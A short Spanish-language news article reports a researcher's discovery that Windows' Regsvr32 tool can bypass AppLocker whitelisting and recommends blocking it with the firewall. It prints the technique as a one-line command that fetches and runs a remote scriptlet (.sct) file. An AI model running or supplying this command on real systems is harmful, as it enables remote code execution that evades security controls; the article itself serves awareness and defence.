Consiguen saltarse la protección de AppLocker de Windows con Regsvr32

Un investigador en seguridad de Colorado (Estados Unidos) llamado Casey Smith ha descubierto una característica en Regsvr32, la herramienta en línea de comandos para registrar y quitar DLL y controles de ActiveX en el registro de Windows, que permite saltarse la seguridad de AppLocker, siendo esto último la característica que permite bloquear o poner en una lista blanca las aplicaciones y programas que pueden ejecutarse en el sistema.

Para saltarse la protección de AppLocker, Casey Smith ejecutó una línea de comando con Regsvr32 que apuntaba a un fichero alojado en un servidor remoto, aunque más tarde el propio investigador descubriría que también funciona con ficheros almacenados localmente. Lo peor de todo es que no se requiere de acceso como administrador para realizar este tipo de acciones, por lo que los usuarios de todo tipo están expuestos a este fallo de seguridad. Por otro lado el exploit no realiza ningún cambio en el registro del sistema.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Regsvr32 es capaz de detectar la presencia proxies, utiliza TLS, sigue redirecciones e incluso es capaz de ejecutar binarios de Windows pudiéndose saltar la protección de AppLocker debido a que Regsvr32 está en su lista blanca, ya que es una función esencial del sistema.

Sin duda se trata de una vulnerabilidad bastante grave que requiere de la aplicación de un parche que sea publicado lo antes posible. Como medida de precaución se recomienda bloquear Regsvr32 y Regsvr64 con el firewall de Windows para evitar la ejecución de código y binarios en remoto a través de esas herramientas.

Fuente | SCO